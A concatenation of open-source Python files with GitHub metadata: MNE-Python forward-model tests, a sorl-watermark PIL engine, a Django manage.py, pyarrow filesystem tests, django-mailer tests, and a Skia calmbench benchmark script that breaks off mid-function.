_compare_source_spaces, setup_source_space)
data_path = testing.data_path(download=False)
fname_meeg = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-meg-eeg-oct-4-fwd.fif')
fname_raw = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data',
'test_raw.fif')
fname_evo = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-ave.fif')
fname_cov = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-cov.fif')
fname_dip = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_set1.dip')
fname_trans = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = os.path.join(data_path, 'subjects')
fname_src = op.join(subjects_dir, 'sample', 'bem', 'sample-oct-4-src.fif')
fname_bem = op.join(subjects_dir, 'sample', 'bem',
'sample-1280-1280-1280-bem-sol.fif')
fname_aseg = op.join(subjects_dir, 'sample', 'mri', 'aseg.mgz')
fname_bem_meg = op.join(subjects_dir, 'sample', 'bem',
'sample-1280-bem-sol.fif')
def _compare_forwards(fwd, fwd_py, n_sensors, n_src,
meg_rtol=1e-4, meg_atol=1e-9,
eeg_rtol=1e-3, eeg_atol=1e-3):
"""Test forwards."""
# check source spaces
assert_equal(len(fwd['src']), len(fwd_py['src']))
_compare_source_spaces(fwd['src'], fwd_py['src'], mode='approx')
for surf_ori, force_fixed in product([False, True], [False, True]):
# use copy here to leave our originals unmodified
fwd = convert_forward_solution(fwd, surf_ori, force_fixed,
copy=True)
fwd_py = convert_forward_solution(fwd_py, surf_ori, force_fixed,
copy=True)
check_src = n_src // 3 if force_fixed else n_src
for key in ('nchan', 'source_rr', 'source_ori',
'surf_ori', 'coord_frame', 'nsource'):
assert_allclose(fwd_py[key], fwd[key], rtol=1e-4, atol=1e-7,
err_msg=key)
# In surf_ori=True only Z matters for source_nn
if surf_ori and not force_fixed:
ori_sl = slice(2, None, 3)
else:
ori_sl = slice(None)
assert_allclose(fwd_py['source_nn'][ori_sl], fwd['source_nn'][ori_sl],
rtol=1e-4, atol=1e-6)
assert_allclose(fwd_py['mri_head_t']['trans'],
fwd['mri_head_t']['trans'], rtol=1e-5, atol=1e-8)
assert_equal(fwd_py['sol']['data'].shape, (n_sensors, check_src))
assert_equal(len(fwd['sol']['row_names']), n_sensors)
assert_equal(len(fwd_py['sol']['row_names']), n_sensors)
# check MEG
assert_allclose(fwd['sol']['data'][:306, ori_sl],
fwd_py['sol']['data'][:306, ori_sl],
rtol=meg_rtol, atol=meg_atol,
err_msg='MEG mismatch')
# check EEG
if fwd['sol']['data'].shape[0] > 306:
assert_allclose(fwd['sol']['data'][306:, ori_sl],
fwd_py['sol']['data'][306:, ori_sl],
rtol=eeg_rtol, atol=eeg_atol,
err_msg='EEG mismatch')
def test_magnetic_dipole():
"""Test basic magnetic dipole forward calculation."""
trans = Transform('mri', 'head')
info = read_info(fname_raw)
picks = pick_types(info, meg=True, eeg=False, exclude=[])
info = pick_info(info, picks[:12])
coils = _create_meg_coils(info['chs'], 'normal', trans)
# magnetic dipole at device origin
r0 = np.array([0., 13., -6.])
for ch, coil in zip(info['chs'], coils):
rr = (ch['loc'][:3] + r0) / 2.
far_fwd = _magnetic_dipole_field_vec(r0[np.newaxis, :], [coil])
near_fwd = _magnetic_dipole_field_vec(rr[np.newaxis, :], [coil])
ratio = 8. if ch['ch_name'][-1] == '1' else 16. # grad vs mag
assert_allclose(np.median(near_fwd / far_fwd), ratio, atol=1e-1)
@testing.requires_testing_data
@requires_mne
def test_make_forward_solution_kit():
"""Test making fwd using KIT, BTI, and CTF (compensated) files."""
kit_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'kit',
'tests', 'data')
sqd_path = op.join(kit_dir, 'test.sqd')
mrk_path = op.join(kit_dir, 'test_mrk.sqd')
elp_path = op.join(kit_dir, 'test_elp.txt')
hsp_path = op.join(kit_dir, 'test_hsp.txt')
trans_path = op.join(kit_dir, 'trans-sample.fif')
fname_kit_raw = op.join(kit_dir, 'test_bin_raw.fif')
bti_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'bti',
'tests', 'data')
bti_pdf = op.join(bti_dir, 'test_pdf_linux')
bti_config = op.join(bti_dir, 'test_config_linux')
bti_hs = op.join(bti_dir, 'test_hs_linux')
fname_bti_raw = op.join(bti_dir, 'exported4D_linux_raw.fif')
fname_ctf_raw = op.join(op.dirname(__file__), '..', '..', 'io', 'tests',
'data', 'test_ctf_comp_raw.fif')
# first set up a small testing source space
temp_dir = _TempDir()
fname_src_small = op.join(temp_dir, 'sample-oct-2-src.fif')
src = setup_source_space('sample', fname_src_small, 'oct2',
subjects_dir=subjects_dir, add_dist=False)
n_src = 108 # this is the resulting # of verts in fwd
# first use mne-C: convert file, make forward solution
fwd = _do_forward_solution('sample', fname_kit_raw, src=fname_src_small,
bem=fname_bem_meg, mri=trans_path,
eeg=False, meg=True, subjects_dir=subjects_dir)
assert_true(isinstance(fwd, Forward))
# now let's use python with the same raw file
fwd_py = make_forward_solution(fname_kit_raw, trans_path, src,
fname_bem_meg, eeg=False, meg=True)
_compare_forwards(fwd, fwd_py, 157, n_src)
assert_true(isinstance(fwd_py, Forward))
# now let's use mne-python all the way
raw_py = read_raw_kit(sqd_path, mrk_path, elp_path, hsp_path)
# without ignore_ref=True, this should throw an error:
assert_raises(NotImplementedError, make_forward_solution, raw_py.info,
src=src, eeg=False, meg=True,
bem=fname_bem_meg, trans=trans_path)
# check that asking for eeg channels (even if they don't exist) is handled
meg_only_info = pick_info(raw_py.info, pick_types(raw_py.info, meg=True,
eeg=False))
fwd_py = make_forward_solution(meg_only_info, src=src, meg=True, eeg=True,
bem=fname_bem_meg, trans=trans_path,
ignore_ref=True)
_compare_forwards(fwd, fwd_py, 157, n_src,
meg_rtol=1e-3, meg_atol=1e-7)
# BTI python end-to-end versus C
fwd = _do_forward_solution('sample', fname_bti_raw, src=fname_src_small,
bem=fname_bem_meg, mri=trans_path,
eeg=False, meg=True, subjects_dir=subjects_dir)
with warnings.catch_warnings(record=True): # weight tables
raw_py = read_raw_bti(bti_pdf, bti_config, bti_hs, preload=False)
fwd_py = make_forward_solution(raw_py.info, src=src, eeg=False, meg=True,
bem=fname_bem_meg, trans=trans_path)
_compare_forwards(fwd, fwd_py, 248, n_src)
# now let's test CTF w/compensation
fwd_py = make_forward_solution(fname_ctf_raw, fname_trans, src,
fname_bem_meg, eeg=False, meg=True)
fwd = _do_forward_solution('sample', fname_ctf_raw, mri=fname_trans,
src=fname_src_small, bem=fname_bem_meg,
eeg=False, meg=True, subjects_dir=subjects_dir)
_compare_forwards(fwd, fwd_py, 274, n_src)
# CTF with compensation changed in python
ctf_raw = read_raw_fif(fname_ctf_raw)
ctf_raw.apply_gradient_compensation(2)
fwd_py = make_forward_solution(ctf_raw.info, fname_trans, src,
fname_bem_meg, eeg=False, meg=True)
with warnings.catch_warnings(record=True):
fwd = _do_forward_solution('sample', ctf_raw, mri=fname_trans,
src=fname_src_small, bem=fname_bem_meg,
eeg=False, meg=True,
subjects_dir=subjects_dir)
_compare_forwards(fwd, fwd_py, 274, n_src)
@slow_test
@testing.requires_testing_data
def test_make_forward_solution():
"""Test making M-EEG forward solution from python."""
fwd_py = make_forward_solution(fname_raw, fname_trans, fname_src,
fname_bem, mindist=5.0, eeg=True, meg=True)
assert_true(isinstance(fwd_py, Forward))
fwd = read_forward_solution(fname_meeg)
assert_true(isinstance(fwd, Forward))
_compare_forwards(fwd, fwd_py, 366, 1494, meg_rtol=1e-3)
@testing.requires_testing_data
@requires_mne
def test_make_forward_solution_sphere():
"""Test making a forward solution with a sphere model."""
temp_dir = _TempDir()
fname_src_small = op.join(temp_dir, 'sample-oct-2-src.fif')
src = setup_source_space('sample', fname_src_small, 'oct2',
subjects_dir=subjects_dir, add_dist=False)
out_name = op.join(temp_dir, 'tmp-fwd.fif')
run_subprocess(['mne_forward_solution', '--meg', '--eeg',
'--meas', fname_raw, '--src', fname_src_small,
'--mri', fname_trans, '--fwd', out_name])
fwd = read_forward_solution(out_name)
sphere = make_sphere_model(verbose=True)
fwd_py = make_forward_solution(fname_raw, fname_trans, src, sphere,
meg=True, eeg=True, verbose=True)
_compare_forwards(fwd, fwd_py, 366, 108,
meg_rtol=5e-1, meg_atol=1e-6,
eeg_rtol=5e-1, eeg_atol=5e-1)
# Since the above is pretty lax, let's check a different way
for meg, eeg in zip([True, False], [False, True]):
fwd_ = pick_types_forward(fwd, meg=meg, eeg=eeg)
fwd_py_ = pick_types_forward(fwd, meg=meg, eeg=eeg)
assert_allclose(np.corrcoef(fwd_['sol']['data'].ravel(),
fwd_py_['sol']['data'].ravel())[0, 1],
1.0, rtol=1e-3)
@slow_test
@testing.requires_testing_data
@requires_nibabel(False)
def test_forward_mixed_source_space():
"""Test making the forward solution for a mixed source space."""
temp_dir = _TempDir()
# get the surface source space
surf = read_source_spaces(fname_src)
# setup two volume source spaces
label_names = get_volume_labels_from_aseg(fname_aseg)
vol_labels = [label_names[int(np.random.rand() * len(label_names))]
for _ in range(2)]
vol1 = setup_volume_source_space('sample', fname=None, pos=20.,
mri=fname_aseg,
volume_label=vol_labels[0],
add_interpolator=False)
vol2 = setup_volume_source_space('sample', fname=None, pos=20.,
mri=fname_aseg,
volume_label=vol_labels[1],
add_interpolator=False)
# merge surfaces and volume
src = surf + vol1 + vol2
# calculate forward solution
fwd = make_forward_solution(fname_raw, fname_trans, src, fname_bem, None)
assert_true(repr(fwd))
# extract source spaces
src_from_fwd = fwd['src']
# get the coordinate frame of each source space
coord_frames = np.array([s['coord_frame'] for s in src_from_fwd])
# assert that all source spaces are in head coordinates
assert_true((coord_frames == FIFF.FIFFV_COORD_HEAD).all())
# run tests for SourceSpaces.export_volume
fname_img = op.join(temp_dir, 'temp-image.mgz')
# head coordinates and mri_resolution, but trans file
assert_raises(ValueError, src_from_fwd.export_volume, fname_img,
mri_resolution=True, trans=None)
# head coordinates and mri_resolution, but wrong trans file
vox_mri_t = vol1[0]['vox_mri_t']
assert_raises(ValueError, src_from_fwd.export_volume, fname_img,
mri_resolution=True, trans=vox_mri_t)
@slow_test
@testing.requires_testing_data
def test_make_forward_dipole():
"""Test forward-projecting dipoles."""
rng = np.random.RandomState(0)
evoked = read_evokeds(fname_evo)[0]
cov = read_cov(fname_cov)
dip_c = read_dipole(fname_dip)
# Only use magnetometers for speed!
picks = pick_types(evoked.info, meg='mag', eeg=False)
evoked.pick_channels([evoked.ch_names[p] for p in picks])
info = evoked.info
# Make new Dipole object with n_test_dipoles picked from the dipoles
# in the test dataset.
n_test_dipoles = 3 # minimum 3 needed to get uneven sampling in time
dipsel = np.sort(rng.permutation(np.arange(len(dip_c)))[:n_test_dipoles])
dip_test = Dipole(times=dip_c.times[dipsel],
pos=dip_c.pos[dipsel],
amplitude=dip_c.amplitude[dipsel],
ori=dip_c.ori[dipsel],
gof=dip_c.gof[dipsel])
sphere = make_sphere_model(head_radius=0.1)
# Warning emitted due to uneven sampling in time
with warnings.catch_warnings(record=True) as w:
fwd, stc = make_forward_dipole(dip_test, sphere, info,
trans=fname_trans)
assert_true(issubclass(w[-1].category, RuntimeWarning))
# stc is list of VolSourceEstimate's
assert_true(isinstance(stc, list))
for nd in range(n_test_dipoles):
assert_true(isinstance(stc[nd], VolSourceEstimate))
# Now simulate evoked responses for each of the test dipoles,
# and fit dipoles to them (sphere model, MEG and EEG)
times, pos, amplitude, ori, gof = [], [], [], [], []
snr = 20. # add a tiny amount of noise to the simulated evokeds
for s in stc:
evo_test = simulate_evoked(fwd, s, info, cov,
snr=snr, random_state=rng)
# evo_test.add_proj(make_eeg_average_ref_proj(evo_test.info))
dfit, resid = fit_dipole(evo_test, cov, sphere, None)
times += dfit.times.tolist()
pos += dfit.pos.tolist()
amplitude += dfit.amplitude.tolist()
ori += dfit.ori.tolist()
gof += dfit.gof.tolist()
# Create a new Dipole object with the dipole fits
dip_fit = Dipole(times, pos, amplitude, ori, gof)
# check that true (test) dipoles and fits are "close"
# cf. mne/tests/test_dipole.py
diff = dip_test.pos - dip_fit.pos
corr = np.corrcoef(dip_test.pos.ravel(), dip_fit.pos.ravel())[0, 1]
dist = np.sqrt(np.mean(np.sum(diff * diff, axis=1)))
gc_dist = 180 / np.pi * \
np.mean(np.arccos(np.sum(dip_test.ori * dip_fit.ori, axis=1)))
amp_err = np.sqrt(np.mean((dip_test.amplitude - dip_fit.amplitude) ** 2))
# Make sure each coordinate is close to reference
# NB tolerance should be set relative to snr of simulated evoked!
assert_allclose(dip_fit.pos, dip_test.pos, rtol=0, atol=1e-2,
err_msg='position mismatch')
assert_true(dist < 1e-2, 'dist: %s' % dist) # within 1 cm
assert_true(corr > 1 - 1e-2, 'corr: %s' % corr)
assert_true(gc_dist < 20, 'gc_dist: %s' % gc_dist) # less than 20 degrees
assert_true(amp_err < 10e-9, 'amp_err: %s' % amp_err) # within 10 nAm
# Make sure rejection works with BEM: one dipole at z=1m
# NB _make_forward.py:_prepare_for_forward will raise a RuntimeError
# if no points are left after min_dist exclusions, hence 2 dips here!
dip_outside = Dipole(times=[0., 0.001],
pos=[[0., 0., 1.0], [0., 0., 0.040]],
amplitude=[100e-9, 100e-9],
ori=[[1., 0., 0.], [1., 0., 0.]], gof=1)
assert_raises(ValueError, make_forward_dipole, dip_outside, fname_bem,
info, fname_trans)
# if we get this far, can safely assume the code works with BEMs too
# -> use sphere again below for speed
# Now make an evenly sampled set of dipoles, some simultaneous,
# should return a VolSourceEstimate regardless
times = [0., 0., 0., 0.001, 0.001, 0.002]
pos = np.random.rand(6, 3) * 0.020 + \
np.array([0., 0., 0.040])[np.newaxis, :]
amplitude = np.random.rand(6) * 100e-9
ori = np.eye(6, 3) + np.eye(6, 3, -3)
gof = np.arange(len(times)) / len(times) # arbitrary
dip_even_samp = Dipole(times, pos, amplitude, ori, gof)
fwd, stc = make_forward_dipole(dip_even_samp, sphere, info,
trans=fname_trans)
assert_true(isinstance, VolSourceEstimate)
assert_allclose(stc.times, np.arange(0., 0.003, 0.001))
run_tests_if_main()
| {
"content_hash": "049c8d5917c736ca1fbe63de42e947bd",
"timestamp": "",
"source": "github",
"line_count": 397,
"max_line_length": 79,
"avg_line_length": 45.931989924433246,
"alnum_prop": 0.5861255826706883,
"repo_name": "nicproulx/mne-python",
"id": "2c7e0a88b8dc95000141ecd0042ab10f0f42b48b",
"size": "18235",
"binary": false,
"copies": "2",
"ref": "refs/heads/placeholder",
"path": "mne/forward/tests/test_make_forward.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Csound Document",
"bytes": "69806"
},
{
"name": "Makefile",
"bytes": "3723"
},
{
"name": "Python",
"bytes": "5866703"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
from sorl.thumbnail.engines.pil_engine import Engine as PILEngine
try:
from PIL import Image, ImageEnhance
except ImportError:
import Image
import ImageEnhance
from .base import WatermarkEngineBase
class Engine(WatermarkEngineBase, PILEngine):
"""PIL based thumbnailing engine with watermark support."""
name = "PIL"
def _watermark(
self, image, watermark_path, opacity, size, position_str, img_format
):
# have to do this because of the confirmed pillow bug to prevent resources
# leakage
# https://github.com/python-pillow/Pillow/issues/835
with open(watermark_path, "rb") as image_file:
with Image.open(image_file) as pil_watermark:
watermark = pil_watermark.copy()
if opacity < 1:
watermark = self._reduce_opacity(watermark, opacity)
if image.mode != "RGBA":
image = image.convert("RGBA")
# create a transparent layer the size of the image and draw the
# watermark in that layer.
if not size:
mark_size = watermark.size
else:
mark_size = self._get_new_watermark_size(size, watermark.size)
options = {"crop": "center", "upscale": mark_size > watermark.size}
watermark = self.scale(watermark, mark_size, options)
watermark = self.crop(watermark, mark_size, options)
layer = Image.new("RGBA", image.size, (0, 0, 0, 0))
if position_str == "tile":
for x_pos in range(0, image.size[0], watermark.size[0]):
for y_pos in range(0, image.size[1], watermark.size[1]):
layer.paste(watermark, (x_pos, y_pos))
else:
position = self._define_watermark_position(
position_str, image.size, mark_size
)
layer.paste(watermark, position)
del watermark
return Image.composite(layer, image, layer)
def _reduce_opacity(self, image, opacity):
if image.mode != "RGBA":
image = image.convert("RGBA")
alpha = image.split()[3]
alpha = ImageEnhance.Brightness(alpha).enhance(opacity)
image.putalpha(alpha)
return image
| {
"content_hash": "288f72707f06e62d3d8431693a24627f",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 82,
"avg_line_length": 38.3448275862069,
"alnum_prop": 0.6061151079136691,
"repo_name": "originell/sorl-watermark",
"id": "e60c298e6fa12e881a1c98728d350f4c3a8c984b",
"size": "2224",
"binary": false,
"copies": "1",
"ref": "refs/heads/modernize-for-2020s",
"path": "sorl_watermarker/engines/pil_engine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19341"
}
],
"symlink_target": ""
} |
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "indaba.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| {
"content_hash": "406771d8ce0e4ef56846db870569088e",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 70,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7092511013215859,
"repo_name": "PyZim/indaba",
"id": "164d86f803ff0b05332c72727593dd889cc76718",
"size": "249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "49353"
},
{
"name": "HTML",
"bytes": "15929"
},
{
"name": "JavaScript",
"bytes": "69850"
},
{
"name": "Makefile",
"bytes": "2270"
},
{
"name": "Python",
"bytes": "28371"
}
],
"symlink_target": ""
} |
import sys
import pyarrow as pa
from pyarrow import filesystem
import pytest
def test_filesystem_deprecated():
with pytest.warns(FutureWarning):
filesystem.LocalFileSystem()
with pytest.warns(FutureWarning):
filesystem.LocalFileSystem.get_instance()
@pytest.mark.skipif(sys.version_info < (3, 7),
reason="getattr needs Python 3.7")
def test_filesystem_deprecated_toplevel():
with pytest.warns(FutureWarning):
pa.localfs
with pytest.warns(FutureWarning):
pa.FileSystem
with pytest.warns(FutureWarning):
pa.LocalFileSystem
with pytest.warns(FutureWarning):
pa.HadoopFileSystem
def test_resolve_uri():
uri = "file:///home/user/myfile.parquet"
fs, path = filesystem.resolve_filesystem_and_path(uri)
assert isinstance(fs, filesystem.LocalFileSystem)
assert path == "/home/user/myfile.parquet"
def test_resolve_local_path():
for uri in ['/home/user/myfile.parquet',
'myfile.parquet',
'my # file ? parquet',
'C:/Windows/myfile.parquet',
r'C:\\Windows\\myfile.parquet',
]:
fs, path = filesystem.resolve_filesystem_and_path(uri)
assert isinstance(fs, filesystem.LocalFileSystem)
assert path == uri
| {
"content_hash": "d7057fb39d5864fe0c4b3a737b3446b4",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 62,
"avg_line_length": 26.4,
"alnum_prop": 0.6454545454545455,
"repo_name": "cpcloud/arrow",
"id": "3d54f33e1f2fdd99ca8679fdadf8be46288a43e3",
"size": "2106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/pyarrow/tests/test_filesystem.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "486660"
},
{
"name": "Awk",
"bytes": "3709"
},
{
"name": "Batchfile",
"bytes": "29705"
},
{
"name": "C",
"bytes": "1078695"
},
{
"name": "C#",
"bytes": "911504"
},
{
"name": "C++",
"bytes": "18880401"
},
{
"name": "CMake",
"bytes": "588081"
},
{
"name": "Cython",
"bytes": "1156054"
},
{
"name": "Dockerfile",
"bytes": "108671"
},
{
"name": "Emacs Lisp",
"bytes": "1916"
},
{
"name": "FreeMarker",
"bytes": "2312"
},
{
"name": "Go",
"bytes": "1794213"
},
{
"name": "HTML",
"bytes": "3430"
},
{
"name": "Java",
"bytes": "5134538"
},
{
"name": "JavaScript",
"bytes": "110059"
},
{
"name": "Jinja",
"bytes": "9101"
},
{
"name": "Julia",
"bytes": "241544"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "MATLAB",
"bytes": "36260"
},
{
"name": "Makefile",
"bytes": "19262"
},
{
"name": "Meson",
"bytes": "55180"
},
{
"name": "Objective-C++",
"bytes": "12128"
},
{
"name": "PLpgSQL",
"bytes": "56995"
},
{
"name": "Perl",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "2417779"
},
{
"name": "R",
"bytes": "864022"
},
{
"name": "Ruby",
"bytes": "1366715"
},
{
"name": "Shell",
"bytes": "312029"
},
{
"name": "Thrift",
"bytes": "142245"
},
{
"name": "TypeScript",
"bytes": "1183174"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from mailer.models import Message, MessageLog
from mailer.engine import send_all
import smtplib
sent_messages = []
class TestMailerEmailBackend(object):
def __init__(self, **kwargs):
global sent_messages
sent_messages = []
def open(self):
pass
def close(self):
pass
def send_messages(self, email_messages):
global sent_messages
sent_messages.extend(email_messages)
class FailingMailerEmailBackend(TestMailerEmailBackend):
def send_messages(self, email_messages):
raise smtplib.SMTPSenderRefused(1, "foo", "[email protected]")
class TestBackend(TestCase):
def test_save_to_db(self):
"""
Test that using send_mail creates a Message object in DB instead, when EMAIL_BACKEND is set.
"""
from django.core.mail import send_mail
self.assertEqual(Message.objects.count(), 0)
with self.settings(EMAIL_BACKEND="mailer.backend.DbBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
self.assertEqual(Message.objects.count(), 1)
class TestSending(TestCase):
def test_mailer_email_backend(self):
"""
Test that calling "manage.py send_mail" actually sends mail using the specified MAILER_EMAIL_BACKEND
"""
global sent_messages
from mailer import send_mail
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.TestMailerEmailBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(len(sent_messages), 0)
from mailer.engine import send_all
send_all()
self.assertEqual(len(sent_messages), 1)
self.assertEqual(Message.objects.count(), 0)
self.assertEqual(MessageLog.objects.count(), 1)
def test_retry_deferred(self):
global sent_messages
from mailer import send_mail
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.FailingMailerEmailBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
send_all()
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(Message.objects.deferred().count(), 1)
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.TestMailerEmailBackend"):
send_all()
self.assertEqual(len(sent_messages), 0)
# Should not have sent the deferred ones
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(Message.objects.deferred().count(), 1)
# Now mark them for retrying
Message.objects.retry_deferred()
send_all()
self.assertEqual(len(sent_messages), 1)
self.assertEqual(Message.objects.count(), 0)
| {
"content_hash": "351c1d73ba035c47723711d8d1267d36",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 108,
"avg_line_length": 35.76829268292683,
"alnum_prop": 0.6406409819297647,
"repo_name": "nai-central/django-mailer",
"id": "0c6a99b3252eaa913c541f3da03de1f8de1ab5c8",
"size": "2933",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "mailer/tests.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from __future__ import print_function
import re
import os
import sys
import time
import json
import subprocess
import shlex
import multiprocessing
import traceback
from argparse import ArgumentParser
from multiprocessing import Process
from threading import Thread
from threading import Lock
from pdb import set_trace
HELP = """
\033[31mPlease call calmbench.py to drive this script if you're not doing so.
This script is not supposed to be used by itself. (At least, it's not easy to
use by itself. The calmbench bots may use this script directly.)
\033[0m
"""
FACTOR = 3 # lower/upper quantile factor
DIFF_T = 0.99 # different enough threshold
TERM = 10 # terminate after this no. of iterations without suspect changes
MAXTRY = 30 # max number of nanobench tries to narrow down suspects
UNITS = "ns µs ms s".split()
timesLock = Lock()
timesA = {}
timesB = {}
def parse_args():
parser = ArgumentParser(description=HELP)
parser.add_argument('outdir', type=str, help="output directory")
parser.add_argument('a', type=str, help="name of A")
parser.add_argument('b', type=str, help="name of B")
parser.add_argument('nano_a', type=str, help="path to A's nanobench binary")
parser.add_argument('nano_b', type=str, help="path to B's nanobench binary")
parser.add_argument('arg_a', type=str, help="args for A's nanobench run")
parser.add_argument('arg_b', type=str, help="args for B's nanobench run")
parser.add_argument('repeat', type=int, help="number of initial runs")
parser.add_argument('skip_b', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
parser.add_argument('config', type=str, help="nanobenh config")
parser.add_argument('threads', type=int, help="number of threads to run")
parser.add_argument('noinit', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
parser.add_argument('--concise', dest='concise', action="store_true",
help="If set, no verbose thread info will be printed.")
parser.set_defaults(concise=False)
# Additional args for bots
BHELP = "bot specific options"
parser.add_argument('--githash', type=str, default="", help=BHELP)
parser.add_argument('--keys', type=str, default=[], nargs='+', help=BHELP)
args = parser.parse_args()
args.skip_b = args.skip_b == "true"
args.noinit = args.noinit == "true"
if args.threads == -1:
args.threads = 1
if args.config in ["8888", "565"]: # multi-thread for CPU only
args.threads = max(1, multiprocessing.cpu_count() / 2)
return args
def append_dict_sorted_array(dict_array, key, value):
if key not in dict_array:
dict_array[key] = []
dict_array[key].append(value)
dict_array[key].sort()
def add_time(args, name, bench, t, unit):
normalized_t = t * 1000 ** UNITS.index(unit);
if name.startswith(args.a):
append_dict_sorted_array(timesA, bench, normalized_t)
else:
append_dict_sorted_array(timesB, bench, normalized_t)
def append_times_from_file(args, name, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
items = line.split()
if len(items) > 10:
bench = items[10]
matches = re.search("([+-]?\d*.?\d+)(s|ms|µs|ns)", items[3])
if (not matches or items[9] != args.config):
continue
time_num = matches.group(1)
time_unit = matches.group(2)
add_time(args, name, bench, float(time_num), time_unit)
class ThreadWithException(Thread):
def __init__(self, target):
super(ThreadWithException, self).__init__(target = target)
self.exception = None
def run(self):
try:
self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
except BaseException as e:
self.exception = e
def join(self, timeout=None):
super(ThreadWithException, self).join(timeout)
class ThreadRunner:
"""Simplest and stupidiest threaded executer."""
def __init__(self, args):
self.concise = args.concise
self.threads = []
def add(self, args, fn):
if len(self.threads) >= args.threads:
self.wait()
t = ThreadWithException(target = fn)
t.daemon = True
self.threads.append(t)
t.start()
def wait(self):
def spin():
i = 0
spinners = [". ", ".. ", "..."]
while len(self.threads) > 0:
timesLock.acquire()
sys.stderr.write(
"\r" + spinners[i % len(spinners)] +
" (%d threads running)" % len(self.threads) +
" \r" # spaces for erasing characters
)
timesLock.release()
time.sleep(0.5)
i += 1
if not self.concise:
ts = Thread(target = spin);
ts.start()
for t in self.threads:
t.join()
exceptions = []
for t in self.threads:
if t.exception:
exceptions.append(t.exception)
self.threads = []
if not self.concise:
ts.join()
if len(exceptions):
for exc in exceptions:
print(exc)
raise exceptions[0]
def split_arg(arg):
raw = shlex.split(arg)
result = []
for r in raw:
if '~' in r:
result.append(os.path.expanduser(r))
else:
result.append(r)
return result
def run(args, threadRunner, name, nano, arg, i):
def task():
file_i = "%s/%s.out%d" % (args.outdir, name, i)
should_run = not args.noinit and not (name == args.b and args.skip_b)
if i <= 0:
should_run = True # always run for suspects
if should_run:
if i > 0:
timesLock.acquire()
print("Init run %d for %s..." % (i, name))
timesLock.release()
subprocess.check_call(["touch", file_i])
with open(file_i, 'w') as f:
subprocess.check_call([nano] + split_arg(arg) +
["--config", args.config], stderr=f, stdout=f)
timesLock.acquire()
append_times_from_file(args, name, file_i)
timesLock.release()
threadRunner.add(args, task)
def init_run(args):
threadRunner = ThreadRunner(args)
for i in range(1, max(args.repeat, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a, args.arg_a, i)
run(args, threadRunner, args.b, args.nano_b, args.arg_b, i)
threadRunner.wait()
def get_lower_upper(values):
i = max(0, (len(values) - 1) / FACTOR)
return values[i], values[-i - 1]
def different_enough(lower1, upper2):
return upper2 < DIFF_T * lower1
# TODO(liyuqian): we used this hacky criteria mainly because that I didn't have
# time to study more rigorous statistical tests. We should adopt a more rigorous
# test in the future.
def get_suspects():
suspects = []
for bench in timesA.keys():
if bench not in timesB:
continue
lowerA, upperA = get_lower_upper(timesA[bench])
lowerB, upperB = get_lower_upper(timesB[bench])
if different_enough(lowerA, upperB) or different_enough(lowerB, upperA):
suspects.append(bench)
return suspects
def process_bench_pattern(s):
if ".skp" in s: # skp bench won't match their exact names...
return "^\"" + s[0:(s.index(".skp") + 3)] + "\""
else:
return "^\"" + s + "\"$"
def suspects_arg(suspects):
patterns = map(process_bench_pattern, suspects)
return " --match " + (" ".join(patterns))
def median(array):
return array[len(array) / 2]
def regression(bench):
a = median(timesA[bench])
b = median(timesB[bench])
if (a == 0): # bad bench, just return no regression
return 1
return b / a
def percentage(x):
return (x - 1) * 100
def format_r(r):
return ('%6.2f' % percentage(r)) + "%"
def normalize_r(r):
if r > 1.0:
return r - 1.0
else:
return 1.0 - 1/r
def test():
args = parse_args()
init_run(args)
last_unchanged_iter = 0
last_suspect_number = -1
tryCnt = 0
it = 0
while tryCnt < MAXTRY:
it += 1
suspects = get_suspects()
if len(suspects) != last_suspect_number:
last_suspect_number = len(suspects)
last_unchanged_iter = it
if (len(suspects) == 0 or it - last_unchanged_iter >= TERM):
break
print("Number of suspects at iteration %d: %d" % (it, len(suspects)))
threadRunner = ThreadRunner(args)
for j in range(1, max(1, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a,
args.arg_a + suspects_arg(suspects), -j)
run(args, threadRunner, args.b, args.nano_b,
args.arg_b + suspects_arg(suspects), -j)
tryCnt += 1
